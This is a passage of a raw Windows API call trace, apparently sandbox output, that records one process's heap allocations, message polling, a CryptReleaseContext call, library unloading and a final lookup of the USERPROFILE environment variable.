RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0265.674] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.675] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.675] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.675] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.676] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.677] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0265.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ba8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0265.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0265.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0265.680] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0265.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0265.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.681] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0265.683] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.684] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.684] FreeLibrary (hLibModule=0x756e0000) returned 1 [0265.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.685] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0265.686] CloseHandle (hObject=0x2a0) returned 1 [0265.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0265.688] CloseHandle (hObject=0x2d0) returned 1 [0265.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.692] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0265.693] GetEnvironmentVariableW (in: lpName="USERPROFILE", 